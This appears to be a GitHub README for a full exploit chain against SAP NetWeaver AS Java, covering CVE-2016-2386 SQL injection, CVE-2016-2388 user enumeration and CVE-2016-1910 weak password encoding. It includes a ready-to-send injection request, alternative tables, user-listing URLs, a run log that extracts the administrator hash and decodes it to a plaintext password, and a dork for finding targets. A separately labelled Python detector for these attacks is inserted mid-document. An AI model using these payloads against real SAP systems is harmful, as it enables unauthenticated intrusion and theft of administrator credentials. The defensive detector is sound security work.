vah13 / Sap_exploit

Here you can get full exploit for SAP NetWeaver AS JAVA

SAP_exploit

Author: Vahagn Vardanyan https://twitter.com/vah_13

Bugs:

CVE-2016-2386 SQL injection

CVE-2016-2388 Information disclosure

CVE-2016-1910 Crypto issue

The following HTTP request is a simple PoC for the anonymous (unauthenticated) time-based SQL injection (CVE-2016-2386) in SAP NetWeaver AS Java UDDI 7.11-7.50:

    POST /UDDISecurityService/UDDISecurityImplBean HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
    SOAPAction:
    Content-Type: text/xml;charset=UTF-8
    Host: nw74:50000
    Content-Length: 500

    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:sec="http://sap.com/esi/uddi/ejb/security/">
      <soapenv:Header/>
      <soapenv:Body>
        <sec:deletePermissionById>
          <permissionId>1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%SHA-512%') AND '1'='1</permissionId>
        </sec:deletePermissionById>
      </soapenv:Body>
    </soapenv:Envelope>

On my SAP test server I have an admin user whose login is "Administrator", so I used this payload:

    %PRIVATE_DATASOURCE.un:Administrator%

Most SAP installations use the j2ee_admin username for the SAP administrator login, so the pattern is usually:

    %PRIVATE_DATASOURCE.un:j2ee_admin%

You can list all SAP user logins using these URLs (CVE-2016-2388, information disclosure):

    1)  http://SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Chat#
    2)  http://SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Messages#

Instead of the J2EE_CONFIGENTRY table you can use these tables:

        UME_STRINGS_PERM
        UME_STRINGS_ACTN
        BC_DDDBDP
        BC_COMPVERS
        TC_WDRR_MRO_LUT
        TC_WDRR_MRO_FILES
        T_CHUNK                !!! very big table; if the SAP server does not respond within 20 seconds, the SQL injection is confirmed
        T_DOMAIN
        T_SESSION
        UME_ACL_SUP_PERM
        UME_ACL_PERM
        UME_ACL_PERM_MEM

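As a defender-side addition (my own example, not code from the vah13 project), the following Python scans constructed request records for the indicators this README gives: a quoted or SQL-keyword-bearing permissionId in a deletePermissionById call to the UDDI endpoint, the 20-second stall, and hits on the two user-listing WebDynpro URLs. The record shape (method, path, body, elapsed seconds) and the use of 20 s as a threshold are assumptions.

```python
import re
import xml.etree.ElementTree as ET

UDDI_ENDPOINT = "/UDDISecurityService/UDDISecurityImplBean"
# User-listing WebDynpro resources named above (CVE-2016-2388).
DISCLOSURE_PATHS = (
    "/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Chat",
    "/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Messages",
)
# A legitimate permissionId is a plain identifier; quotes, SQL keywords or comment tokens are the indicator.
SQLI_PATTERN = re.compile(r"['\"]|\b(select|union|count|from)\b|--|/\*", re.IGNORECASE)
# Minimal SOAP envelope for the affected operation (constructed for the sample log below).
SOAP = ('<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" '
        'xmlns:sec="http://sap.com/esi/uddi/ejb/security/"><soapenv:Body>'
        '<sec:deletePermissionById><permissionId>{pid}</permissionId>'
        '</sec:deletePermissionById></soapenv:Body></soapenv:Envelope>')

def extract_permission_ids(soap_body):
    """Text of every <permissionId> element in the body; [] if it is not well-formed XML."""
    try:
        root = ET.fromstring(soap_body)
    except ET.ParseError:
        return []
    return [el.text or "" for el in root.iter() if el.tag.split("}")[-1] == "permissionId"]

def classify_request(method, path, body, elapsed_s):
    """Findings for one logged request; an empty list means nothing suspicious."""
    findings = []
    if method == "POST" and path.startswith(UDDI_ENDPOINT):
        for pid in extract_permission_ids(body):
            if SQLI_PATTERN.search(pid):
                findings.append("sqli indicator in permissionId: %r" % pid[:40])
        if elapsed_s >= 20:  # assumed threshold: the README's 20 s stall is the time-based signal
            findings.append("UDDI call took %.0fs, possible time-based probe" % elapsed_s)
    if any(path.startswith(p) for p in DISCLOSURE_PATHS):
        findings.append("access to user-listing resource (CVE-2016-2388)")
    return findings

# Constructed sample records: (method, path, body, response time in seconds).
SAMPLE_LOG = [
    ("POST", UDDI_ENDPOINT, SOAP.format(pid="perm-42"), 0.3),
    ("POST", UDDI_ENDPOINT, SOAP.format(pid="1' AND 1=(select COUNT(*) from T_CHUNK) AND '1'='1"), 0.4),
    ("POST", UDDI_ENDPOINT, SOAP.format(pid="perm-7"), 21.0),
    ("GET", DISCLOSURE_PATHS[0], "", 0.1),
    ("GET", "/irj/portal", "", 0.1),
]

def scan(entries):
    """Map record index -> findings for every record that produced at least one."""
    return {i: f for i, (m, p, b, t) in enumerate(entries) if (f := classify_request(m, p, b, t))}
```

Records 1 to 3 of SAMPLE_LOG are flagged (injection syntax, slow response, user-listing URL); the benign UDDI call and the portal request produce nothing.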
An example of a working exploit run:

	C:\Python27\python.exe SQL_injection_CVE-2016-2386.py --host nw74 --port 50000
	start to retrieve data from the table UMS_STRINGS from nw74 server using CVE-2016-2386 exploit
	this may take a few minutes
	Found {SHA-512, 10000, 24}M
	Found {SHA-512, 10000, 24}MT
	Found {SHA-512, 10000, 24}MTI
	Found {SHA-512, 10000, 24}MTIz
	Found {SHA-512, 10000, 24}MTIzU
	Found {SHA-512, 10000, 24}MTIzUV
	Found {SHA-512, 10000, 24}MTIzUVd
	Found {SHA-512, 10000, 24}MTIzUVdF
	Found {SHA-512, 10000, 24}MTIzUVdFY
	Found {SHA-512, 10000, 24}MTIzUVdFYX
	Found {SHA-512, 10000, 24}MTIzUVdFYXN
	Found {SHA-512, 10000, 24}MTIzUVdFYXNk
	Found {SHA-512, 10000, 24}MTIzUVdFYXNk8
	Found {SHA-512, 10000, 24}MTIzUVdFYXNk88
	Found {SHA-512, 10000, 24}MTIzUVdFYXNk88F
	Found {SHA-512, 10000, 24}MTIzUVdFYXNk88Fx
	Found {SHA-512, 10000, 24}MTIzUVdFYXNk88Fxu
	Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuY
	Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC
	Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6
	Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6X

Finally, using CVE-2016-1910 (crypto issue) you can recover the administrator password in plain text:

	base64_decode(MTIzUVdFYXNk88FxuYC6X)=123QWEasdóÁq¹€ºX

CVE-2016-2386

[PDF whitepaper] https://erpscan.com/wp-content/uploads/2017/12/Hardcore-SAP-Penetration-Testing.pdf

[SAP-Google-Dork] inurl:/irj/portal
